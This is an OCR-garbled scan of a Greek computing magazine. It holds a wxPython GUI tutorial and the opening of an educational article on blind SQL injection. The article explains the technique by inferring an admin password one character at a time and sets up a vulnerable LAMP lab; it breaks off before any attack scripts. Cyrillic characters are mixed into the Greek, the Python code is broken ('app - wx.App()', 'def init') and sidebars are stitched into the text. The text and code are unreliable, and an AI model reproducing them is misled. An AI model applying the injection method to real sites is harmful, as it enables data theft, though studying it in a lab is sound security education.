афорес ἄλλες κλάσεις που δεν 
φαίνεται να ανήκουν σε ка- 
ποιες απὸ τις προηγούμενες 
катпуорієс. 

Oa та κατανοήσετε καλύτερα бла 

αυτά фусіка, μόλις δούμε pepikà 

, παραδείγματα! 


Eile Edit Tools Syntax Buffers Window Help 


] 


import wx 
from random import randint 


class DrauPanel (wx. Frame) : 
def init (self): 

super(DrawPanel,self). init  (рагепіжіоге, sizes(640,480),title«"Draw| 

ing Example") 

self.Bind(wx.EVT PAINT, self.OnPaint) 


Την Python προφανώς την ἐχετε 

йдп (κι αν ὀχι θα πρέπει να аматре- 

ξετε στα прота ἄρθρα της σειρἀς 

for i in range(0, 640,32): μας στην Python και ro PyGame), 
dc.SetPen(wx.Pen(wx.Colour(randint(0,255),randint(0,255),randint(8| П η x ' 

nsn, зад) ара χρειάζεστε µόνο тпм αντἰστοι- 


dc.DrawLineli, ο, i, 4908 


def maint): xn βιβλιοθήκη wxPython yia то λει- 


арр - P FRA) Е 
=D Р: ) 
таве пон) ае τουργικο σας. 


app.MainLoop() 


def OnPaint(self, e): 
dc = wx. PaintDC(self) 
dc.Clear() 


"drawing.py" 23L, 592С 14,37 Top 
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Ηνάπτυξη εφαρμογών σε περιβάλλον γραφικών 
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Windows. Επισκεφτείτε την τοποθεσία http://wxpython.org/download. 
php και κατεβάστε ro αντἰστοιχο 32 rj 64bit Windows binary. Μπορείτε ма 
κατεβάσετε sire τη σταθερή (stable) eire την υπό εξέλιξη (development) 
ἐκδοση. 


OS X. Па ὀλες τις σύγχρονες εκδόσεις του OS X, κατεβάστε το 64bit 
development release απὸ την ἴδια σελἰδα (http://wxpython.org/download. 
php). Οι σταθερὲς εκδόσεις λειτουργούν µόνο µε 32bit Python και δεν 
υπάρχει λόγος va παιδευτεἰτε ἄδικα, προσπαθώντας ма пеїсєтє то OS X 
να εκτελέσει την Python σε 32bit mode! 


Linux. Θα βρείτε το wxPython στο repository της διανοµἠς σας. Па na- 
ράδειγμα, στο ubuntu γράψτε sudo apt-get install python-wxgtk2.6 


FreeBSD. Εγκαταστήστε ro port x11-toolkits/py-wxPython28-unicode. 
Μη ro µεταγλωττίσετε σε μέρα καύσωνα, орос! Av το κάνετε και TO pE- 
τανιώσετε, µην πεἰτε оті δεν σας προειδοποιήσαμε. 


To прото σας проуранна σε wxPython 


To прото µας πρὀγραµµα θα υπολογίζει µια κλιµακωτή χρέωση της ΔΕΗ. 
Αστειευόµαστε, φυσικὰ! Ποτέ, ра ποτὲ δεν θα σας δώσουμε τόσο Варєта 
προγράμματα. Ωστόσο, амаукастіка то прото µας πρόγραμμα θα πρέπει 
να εἶναι πολὺ anAó και ката παράδοση θα εἶναι то Hello World. 


Χρησιμοποιήστε λοιπὸν τον αγαπημένο σας editor και γράψτε то napa- 
κάτω πρόγραμμα: 

import wx 

app - wx.App() 

frame - wx.Frame(None, wx.ID ANY, "Hello World") 

caption - wx.StaticText(frame, label-"Hello World of wxPython!") 

frame.Show(True) 

app.MainLoop() 
Αποθηκεύστε то ως hellowx.py kai εκτελἐστε το γράφοντας στη γραµµή 
εντολών: 

python hellowx.py 


Τελικὰ δεν тау kai τόσο δύσκολο -- και σίγουρα δεν ἦταν 200 γραμμές. 
Το αποτέλεσµα βέἐβαια δεν εἶναι και πολύ εντυπωσιακό, αλλά τουλάχιστον 
εἶναι µια πραγματικἠ εφαρμογἠ γραφικών, σε ἑξι μόνο γραμμὲς. Πώς λει- 
τουργεί, ὁμως; Ας δούμε τον κώδικα, γραμμή προς γραμμὴ. 


import wx 
Προφανώς, δηλώνουμε бт! θα χρησιμοποιήσουμε τη βιβλιοθήκη wx. 
app - wx.App() 


Δημιουργεί ἑνα αντικείµενο τύπου εφαρμογής”. Κάθε εφαρμογἠ σε 
wxPython περιέχει ἑνα τέτοιο αντικείµενο. 


frame - wx.Frame(None, wx.ID ANY, "Hello World") 


Δημιουργεί ἑνα αντικείµενο τύπου Frame. Μην σας μπερδεύει п αλλαγή 
ορολογίας: frame εἶναι το παρἀθυρὀ µας! Н πρώτη παράμετρος, η None, 
αναφέρεται στο γονικὀ παράθυρο, αυτό δηλαδἠ nou περιἐχει το παράθυ- 
ро µας. Προφανώςτο napá8upó µας δεν περιἐχεται μέσα σε κάποιο ἆλλο 
για αυτὀ ἐχει και τιµή None. Το wx.ID. ANY αναφέρεται σε ¿va αναγνωρι- 
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στικὀ αριθμό ID, ο οποίος αποδἰδεται σε кавє widget. Στις περισσότερες 
περιπτώσεις δεν θέλουμε (και δεν µας χρησιμεύει) να δώσουμε κάποιο 
συγκεκριµένο αναγνωριστικὀ αριθμό και χρησιμοποιούμε το уух.І0 ANY 
(που στην πραγματικότητα ἐχει τιµή -1). To "Hello World" εἶναι ο τίτλος 
του παραθύρου. 


caption - wx.StaticText(frame, label-"Hello World of wxPython!") 


Н γραμμή дпиюируєї ἑνα απλὸ widget, στην πραγματικότητα ёха στατικὀ 
κείμενο. Н πρώτη παράμετρος, ὁπως ἰσως ἠδη μαντέψατε, εἶναι то yovi- 
ко παράθυρο γι΄ ауто το widget. Το κείμενο nou θα δείχνει το widget то 
δίνουμε µε τον τρόπο που βλέπετε. Στην Python, av ша συνάρτηση ἐχει 
προαιρετικὲς παραμέτρους και θέλουμε να παραλείψουμε κάποιες ємбіа- 
уєсєс αλλά να δώσουμε τιµή σε µια enópevn, χρειάζεται να αναφερθούμε 
с" αυτἠ µε то ὀνομά της (named arguments). Εδώ έχουμε παραλείψει το 
id, το οποίο εἶναι προαιρετικὀ. Θα μπορούσαμε να γράψουμε 


caption - wx.StaticText(frame, wx.ID ANY, "Hello World of 
wxPython!") 


αλλά παραλεϊποντας то id πρέπει πλέον va δώσουμε ro label нє ro ὀνομὰ 
TOU: 


caption - wx.StaticText(frame, label-"Hello World of wxPython!") 
Τέλος, πρέπει va δείξουμε ro frame nou φτιάξαμε: 
frame.Show(True) 


To True (προεπιλεγµένη τιµή nou θα μπορούσε пал! ма παραλειφθεὶ) on- 
раім ὅτι πράγματι θέλουμε ма δείξουμε ro frame. Μια τιμὴ False θα 
το εξαφάνιζε απὸ την οθὀνη! Па να εκτελεστεί η εφαρµογἠ, прёп va 
εκτελἐέσουµε τη μέθοδο MainLoop, στο αντικείµενο της εφαρμογἠς µας: 


app.MainLoop() 


To MainLoop() βάζει την εφαρµογή µας σε ¿va βρὀχο επεξεργασίας oup- 
βάντων, ónou απλά λαμβάνει τα μηνύματα anó το λειτουργικὀ και τα 
επεξεργάζεται κατάλληλα. Παράδειγμα: Ένα μήνυμα εἶναι το κλείσιμο της 
εφαρμογἠς, που συνήθως ἐρχεται отам ο χρήστης πιέσει το (X) στο na- 
ράθυρο. 


Н επεξεργασἰα των συμβάντων γἰνεται µε συναρτήσεις που καλούνται 
event handlers και οι οποίες, προφανώς, δεν γράφονται μόνες τους, ως 
δια μαγείας! Εἶναι δικἠ µας δουλειά να γράψουμε µια оғра апо handlers 
για όλα τα μηνύματα στα οποία θέλουμε να амтідра η єфарноуп µας. 
Κάποια βέβαια µπορεί va τα αγνοεί. Αν ωστόσο δοκιμάσετε να κλείσετε 
το παράθυρο тора, θα δείτε ὁτι γίνεται камоміка av και *ógv* έχουμε 
γράψει σχετικὀ κὠδικα. Εἶναι που το μήνυμα λαμβάνεται апо τις βασικὲς 
κλάσεις του wxPython, οι οποίες ξέρουν --σε αυτή την περίπτωση TOU- 
λάχιστον-- να κάνουν То Σωστόὀ (TM). Αν όμως αρχίσετε να камєте κλικ, 
π.Χ. μέσα στο παράθυρο, δεν θα γίνει τίποτα. Пат! πολύ апла, το μήνυμα 
ναι μεν λαμβάνεται αλλά δεν υπάρχει τίποτα στις βασικὲς κλάσεις της 
wxPython που να λέει τι πρέπει να γίνεται, όταν κάνουμε κλικ σε ἑνα 
StaticText. 


Hello World, απὀπειρα 2 


О τρόπος ue rov onoio ¿xoupe γράψει ro Hello World εἶναι πολύ аплоїкос: 
Στην πραγµατικὀτητα, ἑνας πιο ἐμπειρος προγραμματιστἠς θα то έγραφε 
ὁπως βλέπετε παρακάτω. 


Ηνάπτυξη εφαρμογών σε περιβάλλον γραφικών 
MT 


import wx 
class HelloWorld(wx.Frame): 
def init (self, *args, **kw): 
super(HelloWorld,self). init (*args,**kw) 
self.ShowMessage() 
def ShowMessage(self): 


caption - wx.StaticText(self, label-"Hello World of 
wxPython!") 


self.Show(True) 
def main(): 
hello - wx.App() 
HelloWorld(None, title-"Hello World") 
hello.MainLoop() 
if name == " main " 


main() 


У 9 Application 
v [M] frame_2 (MyFrame1) 
- к= А 
Ξ H panet 1 
ME-LSE 
x а 5їгег_3 
spin сіті 1 
ПЕ tree сіті 1 
У sizer 4 
СЯ button 1 


Common Layout | widget | Events | code | 


wxButton 


Size 85, 32 


Background Li 


Foreground 


P1 | «Design» - frame 2 


0 5 1 
SSSSSSSSSSSSNSNS 7 а 
УУУУ on wxGlade 0.6 


[Αυτο saving... done / 


Ελπίζω να µην паватє σοκ, апо το μέγεθος rou προγράµµατος (εδώ γλι- 
τώσατε апо то PyGame, τι λέμε тора) γιατὶ αν το τρέξετε θα διαπιστώ- 
σετε От! κάνει ακριβώς ro ἴδιο πράγμα µε το προηγούμενο! Τότε γιατἰ va 
μπούμε σε όλον αυτόν το µπελά; Μην ξεχνάτε ὁτι για να εκμεταλλευτού- 
µε πλήρως τον αντικειμενοστρεφἡ προγραμματισμὀ πρέπει va δηµιουρ- 
γούμε та δικἀ µας classes, ὁπως κάναμε και στο PyGame. Τυπικά, δεν θα 
χρησιμοποιούμε απευθεἰας ra classes που παρέχει η wxPython αλλά θα 
φτιάχνουμε біка µας nou θα βασίζονται σε αυτά (derived classes, ὁπως 
λέγονται), και στα οποία θα ἐχουμε τη δυνατότητα va προσθέτουµετις ÕI- 
κὲς µας λειτουργίες παρακάμπτοντας ἡ επεκτείνοντας αυτὲς που παρέχει 
η βασικἠ κλάση. Στο προηγούμενο παράδειγµα φτιάξαμε δικἡ µας κλάση 
για то Frame που θα χρησιμοποιήσουμε. Αυτή κληρονομεὶ τα πάντα anó 
την βασικἠ κλάση wx.Frame, στην οποία βασίζεται: 


class HelloWorld(wx.Frame): 


Προγραμματισμός 
σε περιβάλλον 
γραφικών σημαίνει 
πολλές φορὲς και 


διάφορα βοηθητικά 


εργαλεία, τα οποία 
µας επιτρέπουν 

να σχεδιάζου- 

µε παράθυρα, 
διαλόγους κ.λΠ. 
και να τοποθετή- 
σουµε πάνω τους 


widgets. Όλα кала, 


αρκεί va µη µας 
γράφουν κώδικα 
αόρατο ἡ акаталп- 
πτο (ακούς, Visual 
Basic;) Το wxGlade 
που Ва δούμε σε 
επόμενα άρθρα 


εἶναι ἑνα τέτοιο πε- 


ριβόλλον, για avá- 
πτυξη npoypau- 
μάτων µε βάση 

τα wxWidgets. 
Περιττό у" αναφέ- 
ρουμε От! ка! TO 
ίδιο εἶναι γραμμέ- 
νο σε Python και 
wxPython. 
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Όμως ὁπως παρατηρεἰτε, ἐχουμε επεκτείνει τον constructor (__init__) 
ώστε Tav δημιουργείται το παράθυρο (κι αφού κληθεί o constructor της 
γονικἠς κλάσης) να кале! και το member function ονόματι ShowMessage, 
το οποίο θα δείξει το μήνυμά µας. Με λίγα λόγια, έχουμε éva ειδικὀ na- 
ράθυρο "Hello World". Κάθε φορά που δημιουργείται, περιἐχει και то ur- 
уона µας µέσα. Εμφανίζει μάλιστα και τον εαυτὀ του, αυτόματα (self. 
Show(True)). 


Н παρακάτω γραμμή εἶναι λίγο μυστηριώδης: 

def init (self, *args, **kw): 
Θεωρήστε апла бт! εἶναι ο τρόπος yia να пеєрасоцує οποιεσδήποτε na- 
ραμέτρους στον constructor της βασικἠς κλάσης, που καλούμε αμέσως 
μετά: 

super(HelloWorld,self). init J(*args,**kw) 
Παρατηρήστε бт! ката τη δημιουργἱα του αντικειμένου HelloWorld, ἐχου- 
µε δύο παραμέτρους: 

HelloWorld(None, title-"Hello World") 


όπου φυσικἀ None εἶναι το yovikó παράθυρο και title o τίτλος του napa- 
θύρου µας (παραλεἰψαμε ro ID ενδιάμεσα). Δεν χρειάζεται у’ ανησυχείτε 
για την ὥρα για та *args και **kw. (Αλλά σε περίπτωση που αυτό δεν σας 
αφήσει να κοιμηθείτε το βράδυ, διαβάστε εδώ: http://pythonfilter.com/ 
blog/what-do-args-kw-kwargs-mean.html). Ki ας πάμε тора σε ёха λίγο πιο 
буорфо και πολύπλοκο προγραμματάκι... 


Drawing in wxPython: Marquee 


To παρακάτω πρόγραμμα μοιάζει λίγο µε ro Marquee rou TI-99 (http:// 
bit.ly/ti99marquee). Εκτός rou бт! δεν ἐχει ἦχο, έχει κάποιες ενδιαφέἑρου- 
σες, εχμ, παρενέργειες! 


import wx 

from random import randint 

class DrawPanel(wx.Frame): 
def init (self): 


super(DrawPanel,self). init (рагепі-Мопе, 
size-(640,480),title-"Drawing Example") 


self.Bind(wx.EVT PAINT, self.OnPaint) 
def OnPaint(self, e): 

dc = wx.PaintDC(self) 

dc.Clear() 

for i in range(0,640,32): 


dc.SetPen(wx.Pen(wx.Colour(randint(0,255),randint(0,255), 
randint(0,255)), 32)) 


dc.DrawLine(i, 0, i, 480) 
def main(): 
app = wx.App(False) 


frame = DrawPanel() 


Ηνάπτυξη εφαρμογών σε περιβάλλον γραφικών 
Αα 


frame.Show() 
app.MainLoop() 


' 


if name == " main * 
main() 


Εκτελέστε то και θα δείτε κάποιες Ххронатістєс μπάρες τυχαίου χρώμα- 
τος (randint is your friend) oro паравиро σας. Πα δοκιμάστε ὁμως ма 
μετακινήσετε ἑνα ἆλλο παράθυρο πάνω oro Marquee... Пат! συμβαίνει 
αυτό; Κάθε фора nou το παράθυρο µας ἐχει “καταστραφεί” апо κάποιο 
ἄλλο (й ἐχει μόλις δημιουργηθεί επειδἠ τρἐξαµε την εφαρμµογἠ), το λει- 
τουργικὀ στέλνει ἑνα μήνυμα wx.EVT PAINT то οποίο, πρακτικά, опраї- 
νει: “Ξέρεις, κάτι τρέχει µε To паравиро σου, κάποιος то каЛлишє, αυτά 
nou eixe μέσα διαλύθηκαν. Ξανασχεδίασε τα, σε παρακαλῶ." 


Εἶναι λίγο σοκαριστικὀ: Το πρὀγραμμὰ µας πρέπει να εἶναι πάντα ἐἑτοιμο 
va ξανασχεδιάσει τα περιεχόμενα του παραθύρου του, eire πρὀκειται για 
µια µικρἠ γωνἰα eire για ὁλο το παράθυρο. Πώς ὅμως αντιλαμβανόμαστε 
εμεὶς το event; Κοιτάξτε λίγο τον constructor: 


self.Bind(wx.EVT PAINT, self.OnPaint) 


Όταν λάβουμε μήνυμα wx.EVT. PAINT, εκτελείται то member function 
OnPaint. То dc, device context, εἶναι £va αντικείµενο nou αντιπροσωπεύ- 
ει тпм περιοχἠ του παραθύρου nou χρειάζεται va σχεδιαστεἰ ξανά: Αυτή 
που επικαλύφθηκε ἡ και ὁλο το παράθυρο, αν μόλις тора τρέξαµε την 
εφαρµογή! Εἰμαστε σίγουροι оті µπορείτε να φανταστείτε nog γίνεται η 
σχεδίαση: Δημιουργούμε ἑνα μολύβι (pen) τυχαίου χρώματος και πάχους 
32 pixels και το επιλέγουμε για χρήση oro device context (όλα σε єма): 


dc.SetPen(wx.Pen(wx.Colour(randint(0,255),randint(0,255), 
randint(0,255)), 32)) 


Σχεδιάζουµε τη γραμμή: 
dc.DrawLine(i, 0, i, 480) 


Ὅπως ὁμως αναφἐραµε παραπάνω, ο λόγος της περἰεργης συμπεριφοράς 
του προγρἀμματὸς µας εἶναι: то dc περιέχει «μόνον την περιοχή που 
χρειάζεται να σχεδιαστεί! Apa, то (640,480) nou επιχειροὐμε µε το loop 
έχει vónpa μόνον отау πρὀκειται 
να σχεδιαστεἰ ӧЛо το παράθυρο 
anó την αρχή! Και vai, για όλους 
єсас που γράφατε Visual Basic, 
την επανασχεδίαση του παραθύ- 
ρου την ¿kave η γλὠσσα για εσάς. 
Εἰδατε τι ωραία πράγματα χάνατε; 
р 


Μην περιμένετε μέχρι то επόμενο 
άρθρο µας yia va πειραµατιστεἰ- 
τε µε то wxPython: Έχετε ἀφθο- 
vo διάβασμα ото http://wiki. 
wxpython.org 


Па ἄλλη µια фора, καλὰ ξενύχτια! 


Εντάξει, θα то 
ομολογήσω: OI 
πρώτες єфарио- 
уєс γραφικών που 
έγραψα ἦταν yia 
Windows κι аита 
τα δύο βιβλία 

ἦταν πολύτιμα. 

To «Programming 
Windows, Charles 
Petzold» αντιµετω- 
nite τον проурай- 
ματισμὀ Windows 
σε C χρησιμοποι- 
ώντας то АРІ µε 
TOV κλασικό τρόπο. 
To «Programming 
Windows with 
МЕС» απὀ την 
ἄλλη, χρησιμο- 
ποιεί ra Microsoft 
Foundation 
Classes kai την 
αντικειµενοστρε- 
Фі) С++. Όποιος 
σας καυχιέται От! 
εἶναι Windows 
Programmer και 
δεν ἐχει διαβάσει 
τον Petzold, µπο- 
ρείτε ἀνετα va rov 
κοροϊδεύετε. Θα 
σας βοηθήσουμε 
και εμείς αν χρει- 
астеї :) Αν δείτε 
ro Hello World σε 
МЕС, ба εντυπω- 
σιαστείτε µε TO 
πόσο μοιάζει µε та 
δικά µας αρχικἀ 
προγράμματα! 
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Skill: intermediate 


Tags: input 
sanitization, 
injection point, 
blind SGL 
injection, LAMP, 
themole 


ΕΠΙΘΕΣΗ 
LIA 
ΤΥΦΛΗ: 


Δεν τρελαθήκαμε, обтє βέβαια σκοπεύουμε 
va επιτεθούμε σε ὀλο то Internet. Θα σας 
δείξουμε μόνο éva παιχνίδι ερωτήσεων, 
то onoio παίζεται µε ευπαθείς біктиакес 
εφαρμογές. М" auró το παιχνίδι, χωρὶς va 
ζητάμε και χωρὶς να βλέπουμε auró που 
праунатіка µας ενδιαφέρει, θα εξαγάγουµε 
κρίσιμες πληροφορίες... апо та συμφραζόμενα. 


by 41іЗп 
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Ἴσως йдп παρεξηγήσατε τον τίτλο rou άρθρου, av κι εδώ που та λέμε 
εἶναι αρκετά παραπλανητικὀς! Το σίγουρο πάντως εἶναι ὁτι δεν εννοούμε 
µια επίθεση µε κλειστά μάτια, π.χ., σε οποιονδήποτε ἡ οτιδήποτε βρεθεί 
μπροστὰ µας kai µε απρὀβλεπτες συνέπειες. Αντίθετα, εννοούμε µια eni- 
θεση η onoia βασίζεται σε ὀχι και τόσο φανερά δεδοµένα. Πιο σωστά, σε 
δεδομένα που κρύβονται πἰσω апо γεγονότα, τα οποία συνήθως θεωρού- 
µε αδιάφορα. Μιλάμε για το λεγόμενο blind SQL injection. Πρὀκειται yia 
µια επίθεση που βρίσκεται στις πρὠτες θέσεις του OWASP Top 10, εδώ και 
πολλά Χρόνια (www.owasp.org/index.php/Top 10 2010-A1). Μάλιστα, αξίζει 
να πούμε ὁτι ενώ χαρακτηρἱζεται апо μέτριο βαθμὀ δυσκολίας, ἐχει σο- 
βαρότατες επιπτώσεις! 


Н απαραίτητη θεωρία 


Υπάρχουν χιλιάδες web applications Εκεἰ Έξω (TM), οι οποίες µας εξυπη- 
ρετούν µε τον va ἡ τον ἆλλο τρόπο. Οι περισσότερες апо αυτὲς βασἰζο- 
ута! σε κἄποιο σύστημα διαχείρισης περιεχομένου (Content Management 
System) και, συνεπώς, τις περισσότερες φορές τα δεδομένα βρίσκονται 
αποθηκευμένα σε κάποια βάση. Αυτά τα δεδοµένα ανασύρονται апо τη 
βάση και σερβίρονται στον τελικὀ χρήστη --στον επισκέπτη της εκάστοτε 
web app--, απὀ προγράµµατα γραμμένα σε κάποια scripting language 
(http://en.wikipedia.org/wiki/Server-side scripting). Ουσιαστικά, τα εν 
λόγω προγράµµατα αναλαμβάνουν va μεταφράσουν τις επιλογἐς του 
χρήστη σε ἑνα κατάλληλο ερώτημα (query) προς τη βάση δεδοµένων, 
χρησιμοποιώντας τη γλὠσσα SQL (Structured Query Language). lia na- 
ράδειγµα, ас δούµε va τυπικὀ HTTP request, µε ша παράμετρο ονόματι 
id που μεταφέρεται στον server µε тп μέθοδο GET: 


http://domain.tld/app/itemView?id-1 


AUTÒ ro αἰτημα, ro οποίο ενδέχεται να προέκυψε апо то кЛік TOU χρήστη 
σε κἀποιο σύνδεσμο ἡ σε капою κουμπάκι κάποιας φόρμας, θα µετα- 
φραστεἰ σε query προς τη βάση δεδομένων και θα αποκτήσει µια τέτοια 
μορφή: 

SELECT * FROM items WHERE id-1 


Ta αποτελέσµατα rou eporrjuarog прос τη βάση δεδοµένων θα επιστρα- 
фойм στο χρήστη, µέσω rou HTTP response. Φυσικά, ο χρήστης δεν θα 
παραλάβει µια ξερἠ απάντηση. Διάφορα server-side scripts θα Φφροντί- 
gouv να μορφοποιήσουν και να ντύσουν κατάλληλα τα δεδοµένα, μέσα 
σε κὠδικα HTML. Προφανώς, η óÀn διαδικασἰα εἶναι διάφανη ως прос 
τον χρήστη, ο οποίος δεν βλέπει οὐτε ra queries προς τη βάση, οὐτε τα 
scripts που μορφοποιούν την απάντηση της βάσης. 


Τις περισσότερες φορὲς, οτιδήποτε προέρχεται апо το χρήστη --й µπορεί 
να τροποποιηθεὶ апо αυτόν--, υποβάλλεται σε µια σειρἁ ελέγχων (input 
sanitization). Αυτό συμβαίνει ὥστε κάθε προσπάθεια εκτέλεσης aveni- 
θύμητων ερωτημάτων! προς τη βάση να καταλήγει о" ёха graceful error 
message, µε την ελάχιστη διαρροή πληροφοριών (minimal information 
disclosure). Όμως τι γίνεται στις περιπτώσεις που ο έλεγχος εἶναι avs- 
παρκἠς και η εκτέλεση ενὀς τέτοιου query καθίσταται δυνατή; Τότε, λέμε 
оті υπάρχει ἑνα SQL injection point. Πρόκειται για ἑνα kevó ασφαλείας, 
δηλαδή, το οποίο επιτρέπει την αυθαίρετη εκτέλεση ερωτημάτων προς 


1. Ta ερωτήματα σχηματίζονται στη γλώσσα SQL και όλες οι εκδοχές της συγκεκριμένης γλὠσσας επιτρέπουν 
πολύ περισσότερες ενέργειες απὀ μία απλἠ αναζήτηση. Έτσι, μερικά επικίνδυνα ερωτήματα προς τη βάση θα 
μπορούσαν να εἶναι τα εξἠς: Ποιος εἶναι ο κωδικός του root; Σβήσε τον τάδε пімака. Γράψε то τάδε string στον 
τάδε πίνακα κ.ο.κ. 


Επίθεση στα τυφλά! (μέρος 10) 
WT 


τη βάση κι ἐχει ως συνέπεια την (3 —— — Mozilla Firefox 
κλοπή κρυφών ἠ/και εὐαϊσθητων |2 2% Мет Назу Bookmate роз нер 


[E http4127.0.0:1/ [+] 
πληροφοριών. О! σχετικὲς επιθὲ- Сти 
σεις ονομάζονται SQL injections κι 
ἑνα παρακλάδι τους --auró που θα 
μελετήσουμε--, ονομάζεται blind 
SQL injections. 


It works! 


This is the default web page for this server. 


Συνήθως, ro input sanitization εμποδίζει την εκτέλεση κραυγαλέων ερω- 
τημάτων прос τη βάση και τελικἀ αποτρέπει την ἆμεση αποκάλυψη Kpu- 
pov πληροφοριών. Ωστόσο, ενδέχεται να επιτρέπονται ορισμένα εἰδη 
ερωτημάτων, τα οποία εἶναι φαινομενικά αθώα αλλά μπορούν να οδη- 
γήσουν στην ἐμμεση αποκάλυψη μυστικών πληροφοριών. Σκεφτείτε την 
περίπτωση που η εκτέλεση απαγορευμένων ερωτημάτων --ἡ ερωτημά- 
των µε αποτέλεσµα то λογικό FALSE-- οδηγεί στην εμφάνιση ενὸς μηνύ- 
ματος λάθους, ενώ η εκτέλεση ενὸς επιτρεπόµενου ερωτήματος --ἡ ενὸς 
ερωτήματος µε αποτέλεσµα το λογικὀ TRUE-- να οδηγεί στην εμφάνιση 
μιας κανονικἠς σελίδας. Αυτή п συμπεριφορά μοιάζει αρκετά ασφαλἠς 
yia τη δικτυακἠ εφαρµογἡ και για τη βάση δεδομένων, αλλά δεν εἶναι! 
Με αυτἠ τη συμπεριφορά που παρουσιάζουν та server-side scripts εἶναι 
αδύνατον va τροποποιήσουµε τη βάση ἡ να ζητήσουμε τον κωδικό Kå- 
noiou χρήστη και ма τον δούμε. Με ¿va ερώτημα του τύπου «δείξε µου 
το στοιχείο password, του πἰνακα users και της γραμμἠς που περιέχει TO 
admin», θα παΐρναμε ἑνα ωραιότατο μήνυμα λάθους και θα ησυχάζαμε. 
Ωστόσο, aurr| η συμπεριφορά των scripts επιτρέπει ἑνα παιχνίδι ερωτή- 
σεων µε TOV server, στις οποίες θα παίρνουμε “μονολεκτικἠ” απάντηση: 
Eire ἑνα "va!" (κανονικἠ σελἰδα περιεχομένου) eire ἑνα “όχι” (σελίδα µε 
μήνυμα λάθους). Па να φανεί η επικινδυνότητα αυτού του παιχνιδιού, 
σκεφτείτε ἑνα ερώτημα της µορφής «δεῖξε µου το περιεχόμενο µε іа=1 
AND ο πρὠτος χαρακτήρας rou admin password εἶναι 'A'». Σε ауто το 
ερώτημα ἐχουμε συμπεριλάβει τη λογική πράξη ΚΑΙ (AND). Το прото 
σκέλος του ερωτήματος ζητάει την πρόσβαση σε νόμιμο περιεχόμενο, 
ενώ το δεύτερο υπονοεί ἐναν ἐλεγχο (εἶναι ὀντως "А" το прото γράμμα 
του password του admin;). Av µε την εκτέλεση αυτού του ερωτήματος 
εμφανιστεί µια κανονικἠ σελίδα περιεχοµένου, τότε η λογικἠ πράξη ΚΑΙ 
εἶχε αποτέλεσµα TRUE. Αυτό σημαίνει ότι то прото γράμμα του password 
του admin ἦταν Χόντως3 то A! Αντίθετα, ам η εκτέλεση του παραπάνω 
ερωτήματος εμφανίσει éva μήνυμα λάθους, συµπεραϊνουμε оті η λογική 
πράξη ΚΑΙ εἶχε σαν αποτέλεσμα то FALSE. Επομένως, γνωρἰζουμε πλέον 
ὁτι ο κωδικὸς του admin δεν ξεκινά µε то А και μπορούμε να προχωρή- 
σουµε στο επόμενο γράμμα... ;) 


το) Εν ο ж 


The web server software is running but no content has been added, yet. 


Αφού εγκαταστή- 
σουµε TO πακέτο 
LAMP, μπορούμε 

να τσεκάρουµε 

τη λειτουργία του 
Apache web server 
HE тп βοήθεια ενός 
οποιουδήποτε web 
browser. Όπως 
φαίνεται στην EIKÓ- 
να, o Apache εἰναι 
πανέτοιµμος και 
δέχεται συνδέσεις 
κανονικά. 


Εφόσον o Apache 
λειτουργεί, uno- 
ρούμε va προχω- 
ρήσουμε στη ρὐθ- 
шоп της MySQL. 
Συγκεκριμένα, 
πρέπει να προετοι- 
µάσουµε τη βάση 
και τους αντίστοι- 
χους πίνακες, τους 
οποίους θα χρησι- 
μοποιεί το ευπαθές 
web application. 
[ia TO σκοπό αυτό, 
θα сиубєбойиє στη 
MySQL ωςτοοί... 


M Terminal 
Не Edit View Search Terminal Help 
mysql -u root -p 


Προετοιμασία 


Εἶναι γεγονὸς ὁτι υπάρχουν πολ- 
λὲς βάσεις δεδομένων (MS SQL, 
MySQL, PostgreSQL k.à.), πολ- 
λὲς γλὠσσες scripting (PHP, ASP, 
JSP, ССІ κ.λπ.), πολλὲς μέθοδοι 
για input sanitization και πολλὲς 
ακόμα τεχνικὲς ασφάλειες (Web 
Application Firewalls, Intrusion 
Detection Systems κ.ο.κ.). Αυτή п 
ποικιλία καθιστά κάθε επίθεση SQL 
injection ξεχωριστή κι αρκετά NE- 


SQL monitor. Commands end with 


ght (c) 2000, 2011, Oracle and/or 


tered tr 


' for help. Type "Хе" 


or Mg. 


to clear the current input statement 
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Αφού φορτωθεί то 
αρχείο µε ra ётоша 
SQL statements, 
είμαστε σε θέση 

να τσεκάρουµε ότι 
δημιουργήθηκε η 
βάση (vulndb) που 
θα χρησιμοποιεί η 
ευάλωτη εφαρµογή 
µας. Μπορούμε να 
επεκτείνουµε τους 
ελέγχους, ріхуо- 
vrac ша ματιά στα 
περιεχόμενα της 
νέας βάσης. 
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pinAokn. Στη δικἠ µας περίπτωση θα аплоцстєйсоциє λίγο τα πράγματα, 
αφού ο στόχος µας εἶναι η εξοικείωση µε τη λογικἡ της επίθεσης κι όχι η 
αντιμετώπιση όλων των μηχανισμών άμυνας ενὸς server, οὖτεη ανάλυση 
κάθε πιθανού σεναρίου. Па την παρουσἰασἠ µας, λοιπὸν, θα σηκώσουμε 
va απλοϊκὸ web application σε ¿va біко µας μηχάνημα (Repeat after me: 
Δεν κάνουμε επίθεση σε ξένα μηχανήματα χωρίς την ἀδεια του ιδιοκτήτη, 
οὐτε καν για εκπαιδευτικούς λόγους.) Συγκεκριµένα, θα εγκαταστήσουµε 
το περιβάλλον LAMP? σε ¿va σύστημα µε ro Linux Mint 13 Maya - MATE 
Edition. Δεν υπάρχει κάποιος ιδιαίτερος λὀγος για την επιλογἡ αυτή, 
єктос TOU ὁτι θέλαμε ма δοκιµάσουµε ro MATE. Φυσικά, єсєїс µπορείτε 
να χρησιμοποιήσετε οποιαδήποτε ἄλλη διανοµή ἡ ακόµα και ra Windows. 
Παρεμπιπτόντως, σε αυτή την περίπτωση θα σας φανούν πολύτιμα τα 
σχετικἀ àpOpa του Praeto, στο site του περιοδικού: http://deltahacker. 
gr/?p-89, http://deltahacker.gr/?p-755 και http://deltahacker.gr/?p-809. 


Σε γενικὲς үраррёс̧, ro μηχάνηµα-στόχος θα χρησιμοποιεί τη βάση 
MySQL κι ἑνα πολύ απλὀ script σε PHP, το οποίο ба κάνει ελάχιστο ἑως 
avünapkro sanitization. Па την πραγματοποίηση των επιθέσεων θα αξι- 
οποιήσουµε μερικὰ δικἁ µας scripts (γραμμένα σε Perl), καθώς κι éva 
ἐτοιμο εργαλείο yia SQL injection, µε то буора themole3. Στη συνέχεια 
θα εξετάσουμε апо κοντὰ ὀλη την προετοιμασία του τρωτού server. Ση- 
μειώστε ὁτι όλα ra script που θα δούμε βρίσκονται στο ακόλουθο πακέτο: 
